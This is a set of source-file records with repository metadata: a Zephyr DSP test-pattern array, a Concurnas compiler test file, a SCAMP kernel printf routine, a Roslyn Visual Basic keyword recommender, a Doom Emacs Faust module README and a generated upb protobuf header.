0x295a, 0x37e4, 0xa73c, 0xaa96, 0xbb36, 0xaa93, 0x34d0, 0x38a3, 0x33c0, 0x3850, 0x38e6, 0xa82c, 0x3626, 0x3837, 0x39f8, 0x3a81, 0x31f4, 0xb8b7, 0x305c, 0xb58f, 0x37af, 0xb770, 0x3389, 0x3345, 0xaebf, 0xb435, 0xb05f, 0xb1f9, 0xbc47, 0xae42, 0xb66d, 0xb404, 0x1721, 0xba68, 0x38c4, 0x3196, 0x377c, 0x3451, 0x3961, 0xb8e9, 0xa26f, 0xac09, 0x37b3, 0xafd7, 0xb219, 0x36d7, 0x9aad, 0xb340, 0x9a4c, 0xa697, 0x344e, 0x38b7, 0x31e4, 0xb34e, 0xb18d, 0x39ea, 0x2eb1, 0x33f9, 0xaadd, 0x3594, 0xb6c6, 0x3884, 0x2dad, 0xb527, 0xb8ee, 0x2fcd, 0x3456, 0xb367, 0x34b2, 0xb543, 0xb914, 0xb18c, 0x3437, 0xba47, 0xbc9e, 0xb8f3, 0x328e, 0x3d4a };
Max
1
Trifunik/zephyr
tests/lib/cmsis_dsp/matrix/src/unary_f16.pat
[ "Apache-2.0" ]
//define classes, interfaces et al d=s; class MyClass<X>(-n String, -m String) { a =6; def add(toAdd X) void { } def do(n int) void { this.a= n**5; } class Inner { } } class Singleton { } zzz = new A.C(2,3); bobby List<Integer> = new List<Integer>(1); a = actor MyClass<String>(3); stuff = zzz.a stuff = zzz\.a
Web Ontology Language
1
michaeldesu/Concurnas
tests/com/concurnas/compiler/ast/testClasses.owl
[ "MIT" ]
# kernel printf: this should not be compiled into the "real" kernel because # it takes up quite a lot of space, but it can be included as needed for # debugging include "util.sl"; # compute: # *pdiv = num / denom # *pmod = num % denom # Pass a null pointer if you want to discard one of the results # https://en.wikipedia.org/wiki/Division_algorithm#Integer_division_(unsigned)_with_remainder var divmod = asm { ld x, sp ld r7, 1(x) # r7 = pmod ld r8, 2(x) # r8 = pdiv ld r9, 3(x) # r9 = denom ld r10, 4(x) # r10 = num ld r4, 0 # r4 = Q ld r5, 0 # r5 = R ld r6, 15 # r6 = i # while (i >= 0) divmod_loop: # R = R+R shl r5 # r11 = powers_of_2[i] ld x, powers_of_2 add x, r6 ld r11, (x) # if (num & powers_of_2[i]) R++; ld r12, r10 and r12, r11 jz divmod_cont1 inc r5 divmod_cont1: # if (R >= denom) ld r12, r5 sub r12, r9 # r12 = R - denom jlt divmod_cont2 # R = R - denom ld r5, r12 # Q = Q | powers_of_2[i] or r4, r11 divmod_cont2: # i-- dec r6 jge divmod_loop # if pdiv or pmod are null, they'll point to rom, so writing to them is a no-op # *pdiv = Q ld x, r8 ld (x), r4 # *pmod = R ld x, r7 ld (x), r5 # return ret 4 }; var itoa_alphabet = "0123456789abcdefghijklmnopqrstuvwxyz"; var itoa_space = "................."; # static 17-word buffer # returns pointer to static buffer # "base" should range from 2 to 36 var itoabase = func(num, base) { var s = itoa_space+16; var d; var m; *s = 0; # special case when num == 0 if (num == 0) { *--s = '0'; return s; }; while (num != 0) { divmod(num, base, &d, &m); *--s = *(itoa_alphabet + m); num = d; }; return s; }; # returns pointer to static buffer var itoa = func(num) return itoabase(num, 10); var kprintf = func(fmt, args) { var p = fmt; var argidx = 0; while (*p) { if (*p == '%') { p++; if (!*p) return 0; if (*p == '%') { kputc('%'); } else if (*p == 'c') { kputc(args[argidx++]); } else if (*p == 's') { kputs(args[argidx++]); } else if (*p == 'd') { kputs(itoa(args[argidx++])); } else if (*p == 'x') { kputs(itoabase(args[argidx++],16)); } else { kputs("<???>"); } } else { if (*p == '\n') kputc('\r'); kputc(*p); }; p++; }; };
Slash
5
jes/scamp-cpu
kernel/kprintf.sl
[ "Unlicense" ]
' Licensed to the .NET Foundation under one or more agreements. ' The .NET Foundation licenses this file to you under the MIT license. ' See the LICENSE file in the project root for more information. Imports System.Collections.Immutable Imports System.Threading Imports Microsoft.CodeAnalysis.Completion.Providers Imports Microsoft.CodeAnalysis.VisualBasic.Extensions.ContextQuery Imports Microsoft.CodeAnalysis.VisualBasic.Utilities.IntrinsicOperators Namespace Microsoft.CodeAnalysis.VisualBasic.Completion.KeywordRecommenders.Expressions ''' <summary> ''' Recommends the "GetXmlNamespace" keyword. ''' </summary> Friend Class GetXmlNamespaceKeywordRecommender Inherits AbstractKeywordRecommender Protected Overrides Function RecommendKeywords(context As VisualBasicSyntaxContext, cancellationToken As CancellationToken) As ImmutableArray(Of RecommendedKeyword) If context.IsAnyExpressionContext Then Return ImmutableArray.Create( CreateRecommendedKeywordForIntrinsicOperator(SyntaxKind.GetXmlNamespaceKeyword, VBFeaturesResources.GetXmlNamespace_function, Glyph.MethodPublic, New GetXmlNamespaceExpressionDocumentation(), context.SemanticModel, context.Position)) End If Return ImmutableArray(Of RecommendedKeyword).Empty End Function End Class End Namespace
Visual Basic
4
frandesc/roslyn
src/Features/VisualBasic/Portable/Completion/KeywordRecommenders/Expressions/GetXmlNamespaceKeywordRecommender.vb
[ "MIT" ]
#+TITLE: lang/faust #+DATE: July 23, 2019 #+SINCE: v2.1.0 #+STARTUP: inlineimages * Table of Contents :TOC_3:noexport: - [[#description][Description]] - [[#plugins][Plugins]] - [[#features][Features]] * Description Add support to Faust language inside emacs. + Faust code syntax hightlighting and indentation + Project-based (inter-linked Faust files) + Build/compile with output window + Graphic diagrams generation and vizualisation in the (default) browser + Browse generated C++ code inside Emacs + Inter-linked files/buffers : + From "component" to Faust file + From "include" to Faust library file + From error to file:line number + From function name to online documentation + Fully configurable (build type/target/architecture/toolkit, keyboard shortcuts, etc.) + Automatic keyword completion (if Auto-Complete is installed) + Automatic objets (functions, operators, etc.) template insertion with default sensible values (if Yasnippet is installed) + Modeline indicator of the state of the code ** Plugins + [[https://bitbucket.org/yphil/faustine][faustine]] * Features Keybindings | Binding | Description | |-------------------+----------------------| | ~<localleader> b~ | ~build~ | | ~<localleader> c~ | ~syntax check~ | | ~<localleader> d~ | ~diagram~ | | ~<localleader> h~ | ~online dock~ | | ~<localleader> RET~ | ~mdoc~ | | ~<localleader> o~ | ~toggle output buffer~ | | ~<localleader> s~ | ~source code~ | | ~<localleader> r~ | ~run~ | | ~<localleader> S-b~ | ~build all~ | | ~<localleader> S-d~ | ~diagram all~ |
Org
4
leezu/doom-emacs
modules/lang/faust/README.org
[ "MIT" ]
/* This file was generated by upbc (the upb compiler) from the input * file: * * envoy/config/core/v3/backoff.proto * * Do not edit -- your changes will be discarded when the file is * regenerated. */ #ifndef ENVOY_CONFIG_CORE_V3_BACKOFF_PROTO_UPBDEFS_H_ #define ENVOY_CONFIG_CORE_V3_BACKOFF_PROTO_UPBDEFS_H_ #include "upb/def.h" #include "upb/port_def.inc" #ifdef __cplusplus extern "C" { #endif #include "upb/def.h" #include "upb/port_def.inc" extern upb_def_init envoy_config_core_v3_backoff_proto_upbdefinit; UPB_INLINE const upb_msgdef *envoy_config_core_v3_BackoffStrategy_getmsgdef(upb_symtab *s) { _upb_symtab_loaddefinit(s, &envoy_config_core_v3_backoff_proto_upbdefinit); return upb_symtab_lookupmsg(s, "envoy.config.core.v3.BackoffStrategy"); } #ifdef __cplusplus } /* extern "C" */ #endif #include "upb/port_undef.inc" #endif /* ENVOY_CONFIG_CORE_V3_BACKOFF_PROTO_UPBDEFS_H_ */
C
2
arghyadip01/grpc
src/core/ext/upbdefs-generated/envoy/config/core/v3/backoff.upbdefs.h
[ "Apache-2.0" ]